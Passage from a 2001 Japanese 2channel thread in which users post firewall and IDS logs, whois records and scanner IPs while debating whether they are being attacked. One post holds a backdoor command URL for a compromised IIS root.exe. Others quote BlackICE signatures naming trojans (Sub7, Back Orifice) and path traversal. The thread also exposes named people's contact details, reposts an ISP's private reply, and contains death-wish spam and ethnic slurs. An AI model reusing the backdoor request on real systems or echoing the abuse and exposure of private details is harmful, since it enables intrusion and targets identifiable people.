admin-c: CH93-AP
tech-c: WM12-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
changed: [email protected] 20000601
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: WU MIAN
address: NO.1,RO.DONGYUANHENG,YUEXIUNAN,GUANGZHOU
country: CN
phone: +086-20-83788832
fax-no: +86-20-83788825
e-mail: [email protected]
nic-hdl: WM12-AP
mnt-by: MAINT-CHINANET-GD
changed: [email protected] 20001109
source: APNIC

無駄に長いハリコ

ZoneAlarmのバージョンUPをしましたら、ネットに繋ぐ度に赤の警告で
The firewall has blocked routed traffic from 0.0.0.0 to 0.0.0.0 (IP Protocol 0).
と表示されるようになってしまったのですが、これも不正アクセスなのでしょうか。
違うスレで、気にするなと言われたのですが、毎回毎回ですと、気になってしまって・・・。

すみません、sage忘れました。

[IPネットワークアドレス] 61.203.0.0-61.203.127.0

IP: 211.47.201.17
Node: ｽﾃｽｺﾅ
Group: ﾀ?ｻ?ｽﾇ(<B1>ﾞﾀｯ)
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0001027EBB42
DNS: ｽﾃｽｺﾅﾛ

http://210.130.65.190/scripts/root.exe?/c+dir+"c:\"

211.47.201.17
21: Connect
25: Connect
80: Connect
135: Connect
139: Connect
445: Connect

ここから、何度も侵入されようとしています。ＩＰを少しずつ変えて・・。
明日にでも、プロバイダーに連絡しようと思いますが、これは
どこに連絡すればいいのでしょうか？ぜんぜん分かりません・・・。
ＩＰ：10.2.35.120
IANA (RESERVED-6)
Internet Assigned Numbers Authority
4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: RESERVED-10
Netblock: 10.0.0.0 - 10.255.255.255

Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) [email protected]
(310) 823-9358

Domain System inverse mapping provided by:

BLACKHOLE.ISI.EDU 128.9.64.26
BLACKHOLE.EP.NET 198.32.1.116

These blocks are reserved for special purposes.
Please see RFC 1918 for additional information.

Record last updated on 16-May-2001.
Database last updated on 11-Aug-2001 23:03:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information

なんつーか・・・無知がIDS使ってるのには文句は言わん。
だが・・・

>>688
私のことでしょうか？？すいません。本当に困っています・・。
教えて下さい・・・。

IP: 61.118.150.68
DNS: p3068-ipad02maru.tokyo.ocn.ne.jp
氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね氏ね

いったい、何をされたんだろう。
だいたい、このスレってIPアドレスか、逆引きの結果だけしか
書かれないからいまいち面白くない。
こいつは、こーゆー事をしようとしたとかそういうのが無いとね。

>>691
それが分かっている人はこんなところにだらだらと無意味なwhoisした結果を乗せて
「ボクちゃん、こんなことまで調べられるんだよ」
という顔をしつつも
「でも助けて」
などというまぬけなことはしません。

>>687,689
まず自分のネットワークの管理者に連絡しなさい。

>>687
攻撃されてるってことですが、FWソフトに何使っていてどういうログが出力されてる
くらい書かないと、何もリプライは期待できませんよ。
もしかしたらただのポートスキャンかも知れないし。

secondary.webhancer.com というところから、何度もに侵入しようと
されてるのですが、これは何なんでしょうか？

今日、私のサーバーの管理者とサイバーポリスに連絡してみました。
管理者は、一応問い合わせをしてくれるとのことでしたが、
サイバーポリスによれば、攻撃者が国外（私の場合、某国大使館在日政府公館 から
でした。単にプロクシに利用されているだけかもしれませんが・・）
からの場合、国どうしでいろいろあるのでどうも出来ないといわれてしまいました・・。
現在は、家のPC、モデムの電源は全てはずしてあります・・。こわいので・・。

ログをみてみたところ、どうもここ以外からtelnetでログインされた
かのような形跡もみつかり、さらにおびえています・・・。
そのログは現在見れないので、家にかえってからもう一度みてみます。

私が使用しているFWは「ZONEARAM」と「BlackIce」です。
１分おきくらいに警報がなっています・・。
何ともないとは言われましたが、こわいです・・。
それと、我が家は常設固定IPなので更に恐ろしいんです・・・。
ちなみに、ゾーンアラームはこんな風に警告してました・・。
Your computer was prevented from connecting to 10.2.35.120.

The current Internet security level does not allow NetBIOS Name connections.

User:
Program: blackd
Time: 2001/08/14 1:43:32

ブラックアイスのアタック情報によれば、
重大度（アイコン）,1,
時間, 2001-08-13 　　アタックHTTP port probe,
侵入者10.2.65.58, カウント3, パラメータ port:80,
侵入者のIP10.2.65.58, アタック ID,2003001
応答レベル,一方通行みたいなマークがでてます
重大度（数値）, 39

何が知りたいの？
訳解らん。

>>697
今後、どうしたらいいでしょうか？

それと、どうもトロイをしかけられた形跡がみつかって、
取り除き方が分からず困っています・・。（ラブレターフォーユーとかいう
ウイルスですよね？もありそうでした・・）
今、会社にいるので、家に帰ってからもう一度きます。
夜おそくなってしまうかもしれませんが・・。

ハッタリで2chに喧嘩を売るヴァカ珍。

http://ip.tosp.co.jp/i.asp?I=R20G&HOS=ON

さっきPC再起動しようとしたら、
電源落とすと、PCに接続しているユーザ強制的に落とすよって出たんですけど、
これって不正アクセスですかねー？
netstatしてみたら
LEGIAN-CYBER6ってのがポート2841使ってたんですけど。。。

http://mentai.2ch.net/test/read.cgi?bbs=infosys&key=997407948

>>698
トロイ対策
http://www.moosoft.com/download.php
ウイルス対策
http://213.130.45.146/download/download.htm
AntiVirは、UNIX版もあってGWで駆除とかもできるよ。

>>700
　アクセス出来るようにしているのは貴方なんだから
　不正アクセスじゃないんじゃない？

あーなるほどお
確かに簡単にアクセスできるようになってたんで…。
そう言われれば、ただのアクセスですね。

まあ初めての外部からの無断アクセスだったもので、
ちょっと焦っちゃいました。

>>696
>今日、私のサーバーの管理者とサイバーポリスに連絡してみました。

あのさぁ、自分とこの管理者にじゅうぶんな情報を伝えてないでしょ。
伝えてたらサイバーポリスなんて話が出てくるはずがないもの。

>侵入者のIP10.2.65.58, アタック ID,2003001

これが何を意味してるかわかってる？ わめいてると恥をかくだけだよ。
ここは厨房の吹き溜まりだかららまだいいけどさ。

http://www.nic.ad.jp/jp/faq/ip/q6040.html

>>696
>今後、どうしたらいいでしょうか？

もう一度言う。自分のネットワークの管理者に連絡しなさい。
必要な情報を添えてな。

207.46.228.211 (TCP Port 28805)

202.248.37.74 (DNS

>696
ネタでしょ。
Static NATでも噛ましているの？

差出人の名前が無かったのですが、だれだか特定できますか？
本文も件名もすべて空白でした。
=================================================
X-Apparently-To: [email protected] via web14705.mail.yahoo.com; 13 Aug 2001 16:52:41 -0700 (PDT)
X-Track: -40
Received: from host213-122-2-214.btinternet.com (HELO m0d2r6) (213.122.2.214)
by mta454.mail.yahoo.com with SMTP; 13 Aug 2001 16:52:39 -0700 (PDT)
From:
To: [email protected]
Subject:
Date: Mon, 13 Aug 2001 12:50:15
Mime-Version: 1.0
Content-Type: text/; charset="DEFAULT_CHARSET"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700

せいんとまさやです

どっかのプロバからだったよ　藁

[IPネットワークアドレス] 61.203.0.0-61.203.127.0
またこいつがポートスキャンしてきてるぅ〜！

嫌ならフィルタすればいいじゃん

61.203.160.0-61.203.175.0
株式会社フリービット・ドットコム

だから....プロバイダを晒してどうする...
馬鹿？
馬鹿なの？

約五分間、ポートスキャンしていたしつこいドキュソ野郎！

a. [IPネットワークアドレス] 210.146.29.0-210.146.31.0
b. [ネットワーク名] BAYWELL
f. [組織名] ベイウェル (モリ・クリエイト株式会社)
g. [Organization] BayWeLL (MORICREATE Co.,Ltd.)
m. [運用責任者] KM281JP
n. [技術連絡担当者] KM281JP
p. [ネームサーバ] dns2.odn.ne.jp
p. [ネームサーバ] ns.baywell.ne.jp
y. [通知アドレス] [email protected]

a. [JPNICハンドル] KM281JP
b. [氏名] 森 公雄
c. [Last, First] Mori, Kimio
d. [電子メイル] [email protected]
f. [組織名] ベイウェル(モリ・クリエイト株式会社)
g. [Organization] BayWeLL(MORICREATE Co.,Ltd.)
k. [部署]
l. [Division]
m. [肩書] 代表取締役
n. [Title] President
o. [電話番号] 045-904-1701
p. [FAX番号] 045-904-1700
y. [通知アドレス] [email protected]

氏にやがれ！蛸!!

>>716
馬鹿に訊いてどうする？

from 209.202.196.70

10時になった途端中国からスキャンが始まったＹＯ！
中国は10時からテレホタイムなのかなぁ？（藁

５分で５００回くらい不正アクセスどうなってんだ？

誰かがどうにかしてくれたらいいねえ？

＞＞７２２
どうして今日はこんなに多いんだろう？なんで？

２時間で30回程度だな。

>>702
ありがとうございます。早速ＤＬしました。
>>706
恥を忍んでいいます。すみません、貼って下さったURLの意味がよくわかりません・・。
侵入してきたIPは　bos.kbri.or.jp　です。ここから何度も侵入されようと
しています。

このIPについては、自分の所のプロバイダーに連絡をしてみました。
回答まちです。

そして、ブラックアイスから出た気になるログです。これって、たぶん
何かされてますよね・・・。

login.ftp.count=4
telnet.login=LOGIN:
telnet.password=PASSWORD
[email protected]
tcpprobe.=Sub_7
tcpprobe.=Sub_7_2
udpprobe.=Hack'a'Tack
udpprobe.=Back Orifice 2000
udpprobe.=Trinoo Master
attacklist.filename = attack-list.csv

かなり省略しましたが、こんなかんじです。

10.2.65.58というIPアドレスはプライベートアドレス。
つまり、インターネットでは使わず、LAN内でしか使われない。
要するに>>725は外部からではなく、内部ネットワークから
攻撃を受けているということ。

>>725のネットワーク構成がよくわからんのだが、もしかして
ユーザにプライベートアドレスを付与するCATVネットワークだったりする？

>>726
そうです！構成についてはわかりませんが、
ＣＡＴＶネットワーク使用です。
そして、相手方のインドネシ●共和国大使館と同じﾌﾟﾛﾊﾞｲﾀﾞｰです。

内側からの攻撃？という事はどう防御すればいいのでしょうか？
（とはいえ、外側からきてもわからないのですが・・・）

アタックやめれゴルァと [email protected] にメールを出して終わり
…じゃねーな。MX ひけねーぞ、ここ。メールが届かん。
韓国だけでなくインドネシアもドキュソだったか。
かわりに詳細なログを添えてISPに文句付けれや。もうやったみたいだけど。

とりあえずの対策としては、ファイアウォールが適切に設置してあるのならば、
警告がうざいだけで侵入されたりはしないと思うので、向こうがやめるまで
放置かな。そこからのパケットをルータで遮断してやってもいいけど。

>727
フィルタ機能付きのルータをかますか、PCにゾヌやtinyを入れていたずらされないようにすれば良いんじゃない？
プロバイダがCMTSかCMにフィルタを設定してくれりゃ良いんだけど、CATV会社ってIPに詳しい人が居ないところもあるから（設定変更時のみ外注に委託）言うだけ無駄かもしれない。

202.24.192.17

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.24.192.0
b. [ネットワーク名] NSNET
f. [組織名] 株式会社ニッセン
g. [Organization] Nissen Co., Ltd.
m. [運用責任者] NI013JP
n. [技術連絡担当者] YK5720JP
p. [ネームサーバ] epcot.nissen.co.jp
p. [ネームサーバ] ns.spin.ad.jp
p. [ネームサーバ] ns.kyoto.spin.ad.jp
y. [通知アドレス] [email protected]

うぜえ

211.139.140.137
なんなのコイツは。

>>687
同じかもしれない。

The firewall has blocked Internet access to your computer (HTTP) from 61.75.56.131 (TCP Port 1723) [TCP Flags: S].

Time: 2001/08/15 19:38:24

zone alarmのなんだけどこれって何？
教えて君ですんまそ

>>733
ご自分でどうぞ。↓

IPドメインSEARCH
http://www.mse.co.jp/ip_domain/

>>733
>>734で調べるのはかってですが、間違っても検索結果ここに貼るような厨房行為はなさらないように。

>>728>>729
ありがとうございます。プロバイダーから返事はまだきていませんが、
今日は某国大使館から何かされてはいないようです。（ホッ

ただ、ブラックアイスのログに気になる物が・・・。
これはトロイを仕掛けられてるってことですか？
教えていただいたURLからDLしたアプリケーションでスキャンをしてみましたが
何も発見はされなかったんですが、気になっています。
８月１３日、ブラックアイスが反応する前（私は家にいない時間です）
のログにありました。

telnet.login=LOGIN:
telnet.password=PASSWORD:
telnet.failed=INCORRECT
http.dotdotpath=../../../..
smb.filename.=*/start menu/programs/startup/*.*
smb.filename.=*/startm~1/programs/startup/*.*
smb.filename.=*/autoexec.bat
tcpprobe.=Back_Orifice_2000
tcpprobe.=Sub_7
tcpprobe.=Sub_7_2
udpprobe.=Hack'a'Tack
udpprobe.=Back Orifice 2000
udpprobe.=Trinoo Master
[email protected]
[email protected]
[email protected]
[email protected]

>>732
ケーブルＴＶですか？

うわーん。また何か始まったようです・・。

不正アクセスを野放しにしたらデータとか盗まれるんですか?

>>737
それじゃ私んちでデータを預かりましょうか？

>>738
お願いします！１GBのエロ動画＋エロ画像をお納めください！

IP: 61.125.130.120
DNS: z61-125-130-120.dsl.nma.ne.jp
Node: N5T5Z8
Group: WORKGROUP
MAC: 444553547777

IP: 213.253.19.99
DNS: ice.cream.org

IP: 211.56.218.168
Node: ﾁﾖﾀ酩ﾐ
Group: SEGILINK
NetBIOS: ﾁﾖﾀ酩ﾐ j
MAC: 00609708BE9A
DNS: ﾁﾖﾀ酩ﾐ

http://www2.neocity.to/treebbs/view.cgi?board=003/ninjyakosuke&root=105&target=105&mode=tree&page=1

もともと侵入されてるんですけど
zone alarm proを今インストールして起動してちょっとしたら
ブロックしたみたいなんですけど一気に３こくらいきてます
どうしたらいいかわからないです
The firewall has blocked Internet access to your computer (HTTP) from 210.12.164.251 (TCP Port 4556) [TCP Flags: S].

Time: 01/08/16 19:56:12

The firewall has blocked Internet access to your computer (HTTP) from 210.132.170.23 (TCP Port 4300) [TCP Flags: S].

Time: 01/08/16 19:57:36

The firewall has blocked Internet access to your computer (HTTP) from 210.103.133.5 (TCP Port 1990) [TCP Flags: S].

Time: 01/08/16 20:00:32

zone alarmでブロックしたログってどうやって保存するんですか？
何処に保存されてるかも教えてください

４９分の間に六人もブロックしましたが多くないですか？

>>744
俺もあなたと全く同じ
教えれ
>>745
ＬＯＧを見れるボタンを押したらメモ帳で出てくるから名前を尽けて保存。

>>746
おれは18件
しかもすべて三国人

>>747
フォルダオプションで全部削除したせいか
View logをクリックしてもエクスプローラが起動するだけなんですけど
なんかいい方法知りませんか？
>>748
ぼくのは少ないほうですね

わかりましたC:\WINDOWS\Internet LogsのZAlogですね

みなさんこのログを警察に出してるんですか？

ゾーンアラームのログの見方教えてください

>>751
普通は出さないよ。
DQN警察に提出しても住所と氏名とトンチンカンな事をあれこれ聞かれるだけ。
なんの得も無い。

>>751
警察は嫌いです。しかし何か変なことされているとしたら嫌ですね。

202.248.37.74 (DNS)
こいつが誰か突き止める方法はありますか？何度も何度もうっとおしんです。

The firewall has blocked Internet access to your computer (NetBIOS Name) from 211.74.90.242 (NetBIOS Name).

Time: 01/08/16 21:31:44

これはやばいでしょう。BIOSはかいされたらPC壊れるよ。

202.248.37.74 -> dns.nifty.com

ぞねアラームをいれてない頃三国人を野放しにしていたわけですな。
最悪。

>>756
英語読めてる？
NetBIOSはM$Windowsの共有で使用されるプロトコルのこと。
外部から共有フォルダやコンピュータの検索など、NetBIOS
関係のアクセスがあったのをブロックしたよ！っていって
いるダニ。

>>759
無知ですまん。
で結局安心なわけですか？

漏れも202.248.37.74 (DNS)がアクセス。なんで？

61.121.242.81
61.218.83.190
61.203.82.212
61.142.138.86
61.203.128.194
以下省略・・・どうせ逆引しても串刺してるんだから意味ないよね。
しかし朝鮮・支那からのアタックが少なくなったねぇ。

IP: 210.250.125.23
DNS: pfa7d17.ohtapc00.ap.so-net.ne.jp

何かなあ、可哀相かなあと思いつつ結局晒してるオレ。

IP: 210.139.182.36
DNS: p8bb624.ohtapc00.ap.so-net.ne.jp

し、シツコイ……。今日の23:02:09にまた来やがった。
頼むよ、ソネット……。

[16/Aug/2001 23:17:42] In TCP 62.211.45.2:21439->localhost:8080
[16/Aug/2001 23:17:44] In TCP 62.211.45.2:21811->localhost:1080
[16/Aug/2001 23:17:46] In TCP 62.211.45.2:21439->localhost:8080
[16/Aug/2001 23:17:46] In TCP 62.211.45.2:21811->localhost:1080
[16/Aug/2001 23:17:52] In TCP 62.211.45.2:21439->localhost:8080
[16/Aug/2001 23:17:52] In TCP 62.211.45.2:21811->localhost:1080
[16/Aug/2001 23:18:00] In TCP 62.211.45.2:21974->localhost:1080
[16/Aug/2001 23:18:02] In TCP 62.211.45.2:21974->localhost:1080
[16/Aug/2001 23:18:08] In TCP 62.211.45.2:21974->localhost:1080

串探しにしてはしつこい

つーかさぁ、Zone入れたばっかりなんだろうけど、そんな連続してないアクセス
いちいち晒してもしょうがないでしょ。ただのピンポンダッシュを、しかも、警察に出すって
笑われて終わりだよ。どうせ全部blockedなんだから気にしなくてええんよ。
アタックと言うアタックなんてそう来ないんだから普段はバルーンいちいち出さない設定でいいよ
というか、ログ見ても何をされてるのかわからないんだったら見る必要もない。

いちいちポートスキャンで意味も分からずWhoisして騒いでたら時間の無駄、本末転倒だよ。

この人、レッドコードに感染しているんじゃないですか？
助けてあげてYo！

っとプロバに忠告してあげたくなるような頻繁さで来る。

>>766
電波君？？

>>768
アタック報告厨君？？

210.249.214.221
210.132.181.15
p84b50f.tokyjk02.ap.so-net.ne.jp
投票にやばめなもんつっこみまくられていいかげん鬱。

隔離スレなんだからほっとけ

今、トロイの木馬　Hack "A" Tackで攻撃してきた
ｳﾞｧｶのＩＰを書きます！

211.110.161.176

ネタ？
どっちにしても恥ずかしいからsageたほうが

192.168.1.11から毎晩のようにアクセスされています。
whois検索しても判りません。
誰だヨォー

>>774
それって、LANのローカルIPなんですけど。
whoisで検索はできるわけありませんです。

どういう環境でつないでいるの？
CATVとかだったら、CATV会社に聞いてちょ。

ネタにマジレスｶｺﾜﾙｲ

誰かこのあいぴーに攻撃してください！
127.0.0.1です！おねがいします！

過去に例を見ない厨房スレだ。

厨房に厨房と言って何も教えない人は厨房。と言って中傷する俺も厨房。

766あたりがマジレスだと思うが？つーか散々そういうレスが出てるのに
せっせこ報告厨が頑張ってるから厨房スレなんでしょうに。
まあ隔離スレって形になってるんならとやかく言うべきじゃないかもしれんが
Whoisベタベタ貼る奴とかいるからせめてsageでやって欲しいものだけどねぇ。

下げ忘れただけ

UDPポートスキャンの連続ウザイ。

210.171.22.99

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.171.20.0-210.171.29.0
b. [ネットワーク名] GAONET-CATV
f. [組織名] アイテック阪神株式会社
g. [Organization] ITEC HANSHIN CO.,LTD.
m. [運用責任者] NH183JP
n. [技術連絡担当者] TM947JP
n. [技術連絡担当者] TK588JP
p. [ネームサーバ] ns2.gao.ne.jp
p. [ネームサーバ] ns1.gao.ne.jp
p. [ネームサーバ] sebulba.itami.ed.jp/210.171.23.0
y. [通知アドレス] [email protected]
[割当年月日] 2000/02/23
[返却年月日]
[最終更新] 2000/04/03 10:11:33 (JST)
[email protected]

氏ね。

次からは初級ネットでやってください。

まさに780で言ってる悪い見本が2つ先のレスで見れるんだから愉快でならんよ

・yahoo!Messenger　からIPぬけるのかどうか！？


隠居に教えてくだされ。
＃まじついていけない。

>>777にﾜﾗﾀ

すいませ〜ん。わずか３０分間で１４０回以上
いろんな所からブロックしてま〜す。（藁
今までせいぜい１日２，３回程度だったのに今日は
多すぎるよ〜。

おいおい少ないな。（藁
折れなんかもう３００回以上ブロックしてるよ。
人数多いから面倒。鬱氏のう

フォップビョッムポーーー

http://myhome.naver.com/ed323/

IP: 65.80.105.199
Node: OFFICE
Group: WGPO0001
MAC: 444553540000

UDP トロイの木馬検出

マジうざい。
12分間に18回アタックしてきた
Domain Information: [ドメイン情報]
a. [ドメイン名] MJNET.CO.JP
e. [そしきめい]
f. [組織名] 株式会社アイクコーポレーション
g. [Organization] AIC Corporation
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] KK529JP
n. [技術連絡担当者] TK664JP
p. [ネームサーバ] dns1.mjnet.co.jp
p. [ネームサーバ] dns1.dion.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1996/10/17
[接続年月日] 1996/12/03
[最終更新] 2001/01/26 21:09:24 (JST)
[email protected]

>>792
無意味な事はやめてくださいな。

お世話になっております。
CATVインタ−ネットサ−ビスプロバイダ−”M-NET”を運営しております
マイテレビ株式会社　通信部の榊（さかき）と申します。

このたびは、下記ポ−トスキャンにつきましてご迷惑をおかけ致しまして
申し訳御座いませんでした。頂きましたデ−タより調べさせていただきましたところ
弊社ユ−ザが使用しているIPと判明しまして、先ほど本人へ電話にて連絡をとり
事情を説明しました。ご本人とお話しましたところご本人自体がスキャンソフト等を
動作させた事はないと申しておりまして、ウィルスの可能性もあり得る事も
お話致しました。

また、先日15日にPCの調子が悪くなったと言う事でOSを変更されたとも
言われてましたので、合わせてウィルスのチエック等も重ねてお願い致しました。

今後同じIPよりアタック等の兆項が有る場合お手数で御座いますがご一報頂ければ
幸いです。その場合は、弊社センタ−側にて、該当IPに対してフィルタ-等を施す対
応をさせて頂きますので宜しくお願い致します。


マイテレビ株式会社
通信部　榊　　和幸
042-538-00??

ＩＰ＝61.203.225.254

ざけたコメントありがとさん！ウィルスの可能性ですか・・・

204.179.120.34

204.179.120.34
しつこい。氏ね！

>>794
あんた、ポートスキャンごときでクレームつけてんの？

プロバイダって大変なんだね。
こういうのも相手しなくちゃならんのか。

昨日だけで結局５００回以上警告が鳴り響いてた。（疲）
今日になったらピタッと止まった。
昨日は何の日だったんだ？！

>>798
きっと生理でイライラしてたんでしょう。まぁ大目に見てやってください